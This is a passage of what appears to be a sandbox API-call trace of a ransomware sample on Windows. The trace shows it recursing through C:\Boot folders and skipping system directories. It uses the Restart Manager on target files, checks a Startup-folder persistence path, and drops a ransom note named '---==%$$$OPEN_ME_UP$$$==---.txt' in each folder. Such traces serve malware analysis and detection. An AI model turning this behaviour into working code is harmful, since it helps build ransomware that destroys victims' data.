pszDest="\\\\?\\C:\\Boot\\hu-HU\\.") returned 19 [0082.454] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0082.455] FindNextFileW (in: hFindFile=0x6064a0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010c5ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5c171b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0082.455] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0082.455] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0082.455] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0082.455] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0082.455] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0082.455] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\..") returned 20 [0082.455] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0082.455] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0082.455] FindNextFileW (in: hFindFile=0x6064a0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13360, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0082.455] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0082.455] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0082.455] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0082.455] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0082.455] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0082.455] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 33 [0082.455] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".payload") returned 0x0 [0082.455] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0082.455] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0082.455] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0082.455] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.456] UuidCreate (in: Uuid=0x342f6e4 | out: Uuid=0x342f6e4) returned 0x0 [0082.456] UuidToStringW (in: Uuid=0x342f6e4, StringUuid=0x342f6fc | out: StringUuid=0x342f6fc) returned 0x0 [0082.456] RmStartSession () returned 0x0 [0082.458] RmRegisterResources () returned 0x0 [0082.463] RmGetList () returned 0x0 [0082.549] RmEndSession () returned 0x0 [0082.663] RpcStringFreeW (in: String=0x342f6fc | out: String=0x342f6fc) returned 0x0 [0082.663] FindNextFileW (in: hFindFile=0x6064a0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5c171b, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39d81d8, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb398, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0082.663] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Windows") returned -1 [0082.663] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$Recycle.bin") returned 1 [0082.663] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="System Volume Information") returned -1 [0082.663] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files") returned -1 [0082.663] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files (x86)") returned -1 [0082.663] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\memtest.exe.mui") returned 33 [0082.663] StrStrIW (lpFirst="memtest.exe.mui", lpSrch=".payload") returned 0x0 [0082.663] lstrcmpW (lpString1="memtest.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0082.663] lstrcmpW (lpString1="memtest.exe.mui", lpString2="taridd") returned -1 [0082.663] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\hu-HU\\memtest.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0082.663] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\hu-HU\\memtest.exe.mui" (normalized: "c:\\boot\\hu-hu\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.663] UuidCreate (in: Uuid=0x342f6e4 | out: Uuid=0x342f6e4) returned 0x0 [0082.664] UuidToStringW (in: Uuid=0x342f6e4, StringUuid=0x342f6fc | out: StringUuid=0x342f6fc) returned 0x0 [0082.664] RmStartSession () returned 0x0 [0082.672] RmRegisterResources () returned 0x0 [0082.677] RmGetList () returned 0x0 [0082.771] RmEndSession () returned 0x0 [0082.841] RpcStringFreeW (in: String=0x342f6fc | out: String=0x342f6fc) returned 0x0 [0082.841] FindNextFileW (in: hFindFile=0x6064a0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5c171b, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39d81d8, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb398, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0082.841] FindClose (in: hFindFile=0x6064a0 | out: hFindFile=0x6064a0) returned 1 [0082.841] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 49 [0082.841] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\hu-HU\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\hu-hu\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0082.842] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x3a6, lpNumberOfBytesWritten=0x342f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x342f7ec*=0x3a6, lpOverlapped=0x0) returned 1 [0082.843] CloseHandle (hObject=0x430) returned 1 [0082.844] GetProcessHeap () returned 0x5e0000 [0082.844] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60ec60 | out: hHeap=0x5e0000) returned 1 [0082.844] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010ccad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5d8ab4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="it-IT", cAlternateFileName="")) returned 1 [0082.844] lstrcmpiW (lpString1="it-IT", lpString2="Windows") returned -1 [0082.844] lstrcmpiW (lpString1="it-IT", lpString2="$Recycle.bin") returned 1 [0082.844] lstrcmpiW (lpString1="it-IT", lpString2="System Volume Information") returned -1 [0082.844] lstrcmpiW (lpString1="it-IT", lpString2="Program Files") returned -1 [0082.844] lstrcmpiW (lpString1="it-IT", lpString2="Program Files (x86)") returned -1 [0082.844] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\it-IT") returned 17 [0082.844] lstrcmpW (lpString1="it-IT", lpString2=".") returned 1 [0082.844] lstrcmpW (lpString1="it-IT", lpString2="..") returned 1 [0082.844] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\it-IT", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0082.844] GetProcessHeap () returned 0x5e0000 [0082.844] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60ec60 [0082.844] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\*") returned 19 [0082.844] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\it-IT\\*", lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010ccad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5d8ab4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0x6066e0 [0082.844] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0082.844] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0082.844] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0082.844] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0082.844] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0082.844] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\.") returned 19 [0082.844] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0082.844] FindNextFileW (in: hFindFile=0x6066e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010ccad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5d8ab4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0082.844] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0082.844] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0082.844] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0082.844] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0082.845] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0082.845] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\..") returned 20 [0082.845] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0082.845] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0082.845] FindNextFileW (in: hFindFile=0x6066e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d58, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0082.845] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0082.845] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0082.845] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0082.845] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0082.845] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0082.845] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 33 [0082.845] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".payload") returned 0x0 [0082.845] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0082.845] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0082.845] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0082.845] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.845] UuidCreate (in: Uuid=0x342f6e4 | out: Uuid=0x342f6e4) returned 0x0 [0082.845] UuidToStringW (in: Uuid=0x342f6e4, StringUuid=0x342f6fc | out: StringUuid=0x342f6fc) returned 0x0 [0082.845] RmStartSession () returned 0x0 [0082.847] RmRegisterResources () returned 0x0 [0082.852] RmGetList () returned 0x0 [0082.968] RmEndSession () returned 0x0 [0083.030] RpcStringFreeW (in: String=0x342f6fc | out: String=0x342f6fc) returned 0x0 [0083.030] FindNextFileW (in: hFindFile=0x6066e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5d8ab4, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf30285aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0083.030] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Windows") returned -1 [0083.030] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$Recycle.bin") returned 1 [0083.031] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="System Volume Information") returned -1 [0083.031] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files") returned -1 [0083.031] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files (x86)") returned -1 [0083.031] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\memtest.exe.mui") returned 33 [0083.031] StrStrIW (lpFirst="memtest.exe.mui", lpSrch=".payload") returned 0x0 [0083.031] lstrcmpW (lpString1="memtest.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0083.031] lstrcmpW (lpString1="memtest.exe.mui", lpString2="taridd") returned -1 [0083.031] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\it-IT\\memtest.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0083.031] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\it-IT\\memtest.exe.mui" (normalized: "c:\\boot\\it-it\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.033] UuidCreate (in: Uuid=0x342f6e4 | out: Uuid=0x342f6e4) returned 0x0 [0083.034] UuidToStringW (in: Uuid=0x342f6e4, StringUuid=0x342f6fc | out: StringUuid=0x342f6fc) returned 0x0 [0083.034] RmStartSession () returned 0x0 [0083.035] RmRegisterResources () returned 0x0 [0083.084] RmGetList () returned 0x0 [0083.160] RmEndSession () returned 0x0 [0083.225] RpcStringFreeW (in: String=0x342f6fc | out: String=0x342f6fc) returned 0x0 [0083.226] FindNextFileW (in: hFindFile=0x6066e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5d8ab4, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf30285aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0083.226] FindClose (in: hFindFile=0x6066e0 | out: hFindFile=0x6066e0) returned 1 [0083.226] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 49 [0083.226] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\it-IT\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\it-it\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x344 [0083.299] WriteFile (in: hFile=0x344, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x3a6, lpNumberOfBytesWritten=0x342f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x342f7ec*=0x3a6, lpOverlapped=0x0) returned 1 [0083.300] CloseHandle (hObject=0x344) returned 1 [0083.300] GetProcessHeap () returned 0x5e0000 [0083.300] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60ec60 | out: hHeap=0x5e0000) returned 1 [0083.300] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010d0c0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ed6c6, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0083.300] lstrcmpiW (lpString1="ja-JP", lpString2="Windows") returned -1 [0083.300] lstrcmpiW (lpString1="ja-JP", lpString2="$Recycle.bin") returned 1 [0083.300] lstrcmpiW (lpString1="ja-JP", lpString2="System Volume Information") returned -1 [0083.300] lstrcmpiW (lpString1="ja-JP", lpString2="Program Files") returned -1 [0083.300] lstrcmpiW (lpString1="ja-JP", lpString2="Program Files (x86)") returned -1 [0083.300] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP") returned 17 [0083.300] lstrcmpW (lpString1="ja-JP", lpString2=".") returned 1 [0083.300] lstrcmpW (lpString1="ja-JP", lpString2="..") returned 1 [0083.300] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\ja-JP", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0083.300] GetProcessHeap () returned 0x5e0000 [0083.300] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60ec60 [0083.300] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\*") returned 19 [0083.300] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ja-JP\\*", lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010d0c0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ed6c6, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0x6063e0 [0083.301] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.301] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.301] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.301] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.301] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.301] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\.") returned 19 [0083.301] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.301] FindNextFileW (in: hFindFile=0x6063e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010d0c0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ed6c6, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0083.301] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.301] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.301] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.301] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.301] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.301] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\..") returned 20 [0083.301] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.301] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.301] FindNextFileW (in: hFindFile=0x6063e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48c6596, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10760, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0083.301] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0083.301] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0083.301] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0083.301] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0083.301] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0083.301] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 33 [0083.301] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".payload") returned 0x0 [0083.301] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0083.301] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0083.301] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0083.301] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.302] UuidCreate (in: Uuid=0x342f6e4 | out: Uuid=0x342f6e4) returned 0x0 [0083.302] UuidToStringW (in: Uuid=0x342f6e4, StringUuid=0x342f6fc | out: StringUuid=0x342f6fc) returned 0x0 [0083.302] RmStartSession () returned 0x0 [0083.304] RmRegisterResources () returned 0x0 [0083.309] RmGetList () returned 0x0 [0083.409] RmEndSession () returned 0x0 [0083.474] RpcStringFreeW (in: String=0x342f6fc | out: String=0x342f6fc) returned 0x0 [0083.474] FindNextFileW (in: hFindFile=0x6063e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5ed6c6, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf300233f, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa798, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0083.474] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Windows") returned -1 [0083.474] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$Recycle.bin") returned 1 [0083.475] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="System Volume Information") returned -1 [0083.475] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files") returned -1 [0083.475] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files (x86)") returned -1 [0083.475] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\memtest.exe.mui") returned 33 [0083.475] StrStrIW (lpFirst="memtest.exe.mui", lpSrch=".payload") returned 0x0 [0083.475] lstrcmpW (lpString1="memtest.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0083.475] lstrcmpW (lpString1="memtest.exe.mui", lpString2="taridd") returned -1 [0083.475] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\ja-JP\\memtest.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0083.475] CreateFileW 